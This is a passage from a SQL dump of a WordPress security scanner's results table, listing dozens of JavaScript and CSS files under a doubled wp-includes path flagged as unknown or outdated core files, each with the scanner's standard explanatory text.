More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/clipboard.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34076,1631564691,1631564691,'new','knownfile',75,'2dadfa6e46e6c7a6a03f12987e6f6524','c7d3582c89c9e4bb668b987e5752cdb4','Unknown file in WordPress core: wp-includes/wp-includes/js/codemirror/codemirror.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/js/codemirror/codemirror.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34077,1631564691,1631564691,'new','knownfile',75,'845389c262b5085f9ffa9ec1d86cca2b','478d3b2497125f7ccd350908f4b48ea1','Unknown file in WordPress core: wp-includes/wp-includes/js/codemirror/codemirror.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/codemirror/codemirror.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34078,1631564691,1631564691,'new','knownfile',75,'3974ce0decf98bf0744f37e6bae75f38','10da66140fcd5f63875a4b588e66de0c','Unknown file in WordPress core: wp-includes/wp-includes/js/codemirror/csslint.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/codemirror/csslint.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34079,1631564691,1631564691,'new','knownfile',75,'9e7c1c00d41a3abd44f3631467663b7f','33b92a2ac253f119962e8308a7bc645a','Unknown file in WordPress core: wp-includes/wp-includes/js/codemirror/esprima.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/codemirror/esprima.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34080,1631564691,1631564691,'new','knownfile',75,'31e2da3a77d3923b273e5885fa339404','4df016b7399fe169dd220333becde7ec','Unknown file in WordPress core: wp-includes/wp-includes/js/codemirror/fakejshint.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/codemirror/fakejshint.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34081,1631564691,1631564691,'new','knownfile',75,'7400e4d70d13d516051f895bc501f9c5','4d29f33677622451f372d567e3ad5b84','Unknown file in WordPress core: wp-includes/wp-includes/js/codemirror/htmlhint-kses.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/js/codemirror/htmlhint-kses.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34082,1631564691,1631564691,'new','knownfile',75,'d6492a7ed334f822b6b5dbab9a27f8a7','bcaaaa5ba796379b38ee22cc7a1b5298','Unknown file in WordPress core: wp-includes/wp-includes/js/codemirror/htmlhint.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/codemirror/htmlhint.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34083,1631564692,1631564692,'new','knownfile',75,'a375b70adfc548deb21deb053893ed9c','8d3d3d4d673405fb8f8c4cc7db22edc0','Unknown file in WordPress core: wp-includes/wp-includes/js/codemirror/jsonlint.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/codemirror/jsonlint.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34084,1631564692,1631564692,'new','knownfile',25,'b643e08a202adb65a058deb2585280bd','46bed733584dcf8c23f3504c73332b1c','Old WordPress core file not removed during update: wp-includes/wp-includes/js/colorpicker.js','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/js/colorpicker.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34085,1631564692,1631564692,'new','knownfile',75,'850aceb1c3a66ac4d93b03907e63b3b2','b6f8a17d244504fa7886626aed910a6f','Unknown file in WordPress core: wp-includes/wp-includes/js/colorpicker.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/colorpicker.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34086,1631564692,1631564692,'new','knownfile',75,'3c31752954063debe37ad766d2914e0c','cfa9cbd5e77921b2cce64c83fddb7691','Unknown file in WordPress core: wp-includes/wp-includes/js/comment-reply.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/comment-reply.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34087,1631564692,1631564692,'new','knownfile',75,'ed313d3dcdc8d9b453d408b4e5428b5e','9d7e69ef1fbc399a367d5023a67a15d1','Unknown file in WordPress core: wp-includes/wp-includes/js/comment-reply.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/comment-reply.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34088,1631564692,1631564692,'new','knownfile',75,'5e55a70dc8fc79a952874ca36bd53f57','82b0f9458e75540a40e2c002165c0efc','Unknown file in WordPress core: wp-includes/wp-includes/js/crop/cropper.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/crop/cropper.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34089,1631564692,1631564692,'new','knownfile',75,'4f42be6f6f02c623639ffcb8797867cd','7426a22ed62233ae94d21a1c2738710e','Unknown file in WordPress core: wp-includes/wp-includes/js/crop/cropper.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/crop/cropper.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34090,1631564692,1631564692,'new','knownfile',75,'ded7369d4f618f86e85a9b4d85b8c4b2','93abedb124a7dff770c1f1ff5ac05142','Unknown file in WordPress core: wp-includes/wp-includes/js/crop/marqueeHoriz.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/crop/marqueeHoriz.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34091,1631564692,1631564692,'new','knownfile',75,'6d70420461870b8dda525eadc6b739bf','829c0eb67175f9949b812e68e9b74256','Unknown file in WordPress core: wp-includes/wp-includes/js/crop/marqueeVert.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/crop/marqueeVert.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34092,1631564692,1631564692,'new','knownfile',75,'dfb79e4cbaec94ad5b055a456f10e8b2','d587befecfe9226f1ba72454f8238fcd','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-base.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/customize-base.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34093,1631564692,1631564692,'new','knownfile',75,'8a8fae3620ad2a827634e40a42ce3814','099b5e7956e76dfbdaa044304d6e2153','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-base.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/customize-base.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34094,1631564692,1631564692,'new','knownfile',75,'1d4e54642c39e11ee78371644d02d8d7','a6fb1a84c1b1eb87e8e4c97e194ed6fe','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-loader.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/customize-loader.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34095,1631564692,1631564692,'new','knownfile',75,'d27c7b21a696ddf8592c69e371540832','5d4cab20dc07c2d50586be30762af050','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-loader.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/customize-loader.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34096,1631564692,1631564692,'new','knownfile',75,'a341945718846606e48ca03146d2c43f','c7e0e843a146ecc45d8ceedad09f3322','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-models.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/customize-models.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34097,1631564692,1631564692,'new','knownfile',75,'ada4cadb803ef4da4da2a5e3f999bea0','3028a7c3becd12614301ad177189629f','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-models.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/customize-models.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34098,1631564692,1631564692,'new','knownfile',75,'a860cd826b5f7b12e0d1d4cb00807f3a','8b4822568e9dd610509a55c38b896ad8','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-preview-nav-menus.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/customize-preview-nav-menus.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34099,1631564692,1631564692,'new','knownfile',75,'8ed287889ebbe7f4b222ad4254fbd6f2','9f002e456f1ca6b55b962254a7a83416','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-preview-nav-menus.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/js/customize-preview-nav-menus.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34100,1631564692,1631564692,'new','knownfile',75,'e3da0c1078a8f09ed78620b49c8752ff','3108ed5dd8a62c45c6dff7dfc7c0b8f1','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-preview-widgets.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/customize-preview-widgets.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34101,1631564692,1631564692,'new','knownfile',75,'573bef44f73d04c8f610b9d7464beae9','89fbfaa4409fac4d7c3978e61f6920ba','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-preview-widgets.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/js/customize-preview-widgets.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34102,1631564692,1631564692,'new','knownfile',75,'ea96f831cb15dbd7a18a1eeff5d99554','64dd6d6caa86cba03030d87adf054380','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-preview.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/customize-preview.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34103,1631564692,1631564692,'new','knownfile',75,'e3648fbb385451ce445afdda42ed5b37','82939c18ccbabcaa5ccac35386d7852c','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-preview.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/customize-preview.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34104,1631564692,1631564692,'new','knownfile',75,'0d98060f3b020f94036523d1951e06d9','99378dfab5134b21ebc6be807dc08c83','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-selective-refresh.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/customize-selective-refresh.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34105,1631564692,1631564692,'new','knownfile',75,'3ffd65717c91719bc0bb777e49534220','00d28f87a440a49a363f2d3a0a67316d','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-selective-refresh.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/js/customize-selective-refresh.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34106,1631564692,1631564692,'new','knownfile',75,'c0d492128e06d723598104dda8572684','ffbc5f1342b96912840405a7221b2382','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-views.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/customize-views.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34107,1631564692,1631564692,'new','knownfile',75,'791825bd917de8fbfcd0f3334c1a7a8e','fcc1a18241bcc76da99d8867b089c596','Unknown file in WordPress core: wp-includes/wp-includes/js/customize-views.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/customize-views.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34108,1631564692,1631564692,'new','knownfile',75,'972629346cea1f6bbc99561f5c4086bf','2bb08d8fbcb4d3461bae8482edaea3cb','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/a11y.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/js/dist/a11y.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34109,1631564692,1631564692,'new','knownfile',75,'f328a9fa87ba3590aa257cd7d33bb1fc','3b355a04851b39b55452f036e6b3257c','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/a11y.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/dist/a11y.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34110,1631564693,1631564693,'new','knownfile',75,'3e03130f79a351803fc1cc6d5edf14b8','702bf5eff15b2951f05514b52942cd4c','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/annotations.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/dist/annotations.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34111,1631564693,1631564693,'new','knownfile',75,'f35cdb8626c13df8150429ec1c78aa45','01accab31e799e0d97ab6c29566f3027','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/annotations.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/dist/annotations.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34112,1631564693,1631564693,'new','knownfile',75,'87b30d27baf91d42cc5a721f0776a159','dba3de58d38cb9be3d02de10ac3779b0','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/api-fetch.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/dist/api-fetch.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34113,1631564693,1631564693,'new','knownfile',75,'22661950f51e9b293c373b583d0c5128','72aaf5620227f905b87a07be7024aaa1','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/api-fetch.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/dist/api-fetch.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34114,1631564693,1631564693,'new','knownfile',75,'f923b9656cde52b0b31e3005c1c1ebe4','667b0a9fd0e53e03b5b8c4c4fc028264','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/autop.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/js/dist/autop.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34115,1631564693,1631564693,'new','knownfile',75,'51370dda822a010353308d2bee748e68','3b9dad7dcd65d558abf6cf2d453a6dd6','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/autop.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/dist/autop.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34116,1631564693,1631564693,'new','knownfile',75,'9498636dc73d70dc0c8012b1985a0201','287cf2b18c51c8e8b822025d0d489350','Unknown file in WordPress core: 